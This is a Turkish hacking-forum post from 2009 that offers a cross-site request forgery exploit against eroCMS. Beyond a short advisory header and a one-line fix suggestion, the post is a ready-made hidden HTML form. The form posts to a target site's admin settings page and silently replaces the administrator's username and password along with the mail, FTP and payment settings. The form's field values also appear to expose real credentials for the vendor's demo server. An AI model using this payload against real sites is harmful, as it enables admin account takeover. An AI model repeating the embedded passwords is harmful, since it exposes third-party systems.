ROOT
FORUM ROOT
PORTAL ROOT
CYBER NAVIGATION
DÖKÜMANLAR
DÖKÜMAN EKLE
DOWNLOAD/DOSYA ARSIVI
BASINDA CW
CYBER ACADEMY
ORGANIZASYON
NELER YAPTIK?
OPERASYON YÖNETIM SISTEMI
GÖREV ORG. BASVURU
YÖNETICI BASVURU FORMU
MISYON
KURALLAR
KEFALET
KEFIL HAVUZU
MEMBER NAVIGATION
YENI ÜYE BASVURU
PROFIL
MEMBER NETWORK
SIFREMI UNUTTUM
ÖZEL MESAJLARIM
ONAY E-POSTA GÖNDER
Root
>
Exploits / Vulnerabilities
> eroCMS ~ XSRF Vuln.
eroCMS ~ XSRF Vuln. | Cyber-Warrior Information Technology's World
Madde
Author :
Bug Researchers/CWCaspeR
Date :
04.11.2009 23:28:04
#
eroCMS ~ XSRF Vuln.
[Full Screen Display]
< ------------------- header data start ------------------- > ############################################################# # Application Name : eroCMS # vulnerable Type : xsrf # Infection : Uzaktan otomatik olarak user bilgileri degistirebilinir. # Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir. # author : http://demo.erocms.net/admin/index.php?site=settings ############################################################# < ------------------- header data end of ------------------- > < -- bug code start -- > <form name=formular action=http://hedefsite.com/SCRIPTYOLU/admin/index.php?site=settings method=post enctype=multipart/form-data> <input type=hidden name=username value=KULLANICIADI size=60 /> <input type=hidden name=password value=SIFRENIZ size=60 /> <input type=hidden name=wartung size=60 /> <input type=hidden name=wartung_headline value=W size=60 /> <input type=hidden name=wartung_text value=bild und video bearbeitung size=60 /> <input type=hidden name=amateur_name value=geile Pussy size=60 /> <input type=hidden name=reset_pn /> <textarea style=width:1px; height:1px name=welcome_pn>test seite </hiddenarea> <input type=hidden name=email_bei_pn checked=checked size=60 /> <input type=hidden name=email value=info@erocms.net size=60 /> <input type=hidden name=absender value=eroCMS size=60 /> <input type=hidden name=smtp_host value=mail.erocms.net size=60 /> <input type=hidden name=smtp_user value=web1p1 size=60 /> <input type=hidden name=smtp_pass value=Nordin81 size=60 /> <input type=hidden name=smtp_auth checked=checked size=60 /> <input type=hidden name=ftp_host value=demo.erocms.net size=60 /> <input type=hidden name=ftp_port value= size=60 /> <input type=hidden name=ftp_user value=web1 size=60 /> <input type=hidden name=ftp_pass value=Nordin81 size=60 /> <input type=hidden name=ftp_path value=/html/demo/upload/temp size=60 /> <input type=hidden name=is_sue checked=checked size=60 /> <input type=hidden name=sue_kundenid value=0 size=60 /> <input type=hidden name=sue_projektid value=0 size=60 /> <input type=hidden name=sue_pass value=localhost size=60 /> <input type=hidden name=sue_bonus_10 value=0 size=60 /> <input type=hidden name=sue_bonus_25 value=3 size=60 /> <input type=hidden name=sue_bonus_50 value=6 size=60 /> <input type=hidden name=sue_bonus_100 value=10 size=60 /> <input type=hidden name=sue_bonus_150 value=15 size=60 /> <input type=hidden name=sue_bonus_200 value=20 size=60 /> <input type=hidden name=is_sl checked=checked size=60 /> <input type=hidden name=sl_projektid value=78410 size=60 /> <input type=hidden name=sl_pass value=Nordin81 size=60 /> <input type=hidden name=sl_bonus_10 value=10 size=60 /> <input type=hidden name=sl_bonus_25 value=25 size=60 /> <input type=hidden name=sl_bonus_50 value=50 size=60 /> <input type=hidden name=sl_bonus_100 value=100 size=60 /> <input type=hidden name=sl_bonus_150 value=150 size=60 /> <input type=hidden name=sl_bonus_200 value=200 size=60 /> <input type=hidden name=is_netdebit checked=checked size=60 /> <input type=hidden name=is_netdebit_testmodus size=60 /> <input type=hidden name=netdebit_partner_id value=0 size=60 /> <input type=hidden name=netdebit_content_id value=0 size=60 /> <input type=hidden name=netdebit_webmaster_id value=0 size=60 /> <input type=hidden name=is_cab checked=checked size=60 /> <input type=hidden name=cab_id value=0 size=60 /> <input type=hidden name=cab_link value= size=60 /> <input type=hidden name=adress_daten size=60 /> <input type=hidden name=coins value=0 size=60 /> <input type=hidden name=bilderrotation checked=checked size=60 /> <input type=hidden name=videothek_on_off checked=checked size=60 /> <input type=hidden name=vorschaltseite size=60 /> <input type=hidden name=ueber18 size=60 /> <input type=hidden name=is_impress size=60 /> <input type=hidden name=header_onoff checked=checked size=60 /> <input type=hidden name=regmail checked=checked size=60 /> <input type=hidden name=friends checked=checked size=60 /> <select name=templates size=1><option value=candyallover >candyallover</option></select> <input type=hidden name=url value=demo.erocms.net size=60 /> <textarea style=width:500px; height:150px; name=meta_header cols=5 rows=5></textarea> <input type=hidden name=title value=eroCMS size=60 /> <input type=hidden name=keywords value=eroCMS, size=60 /> <input type=hidden name=description value=eroCMS size=60 /> <input type=submit name=submit_settings value=BUTONADI /> </form> < -- bug code end of -- >
Cyber-Warrior TIM All Legal and illegal Rights Reserved.\CWDoktoray 2001©
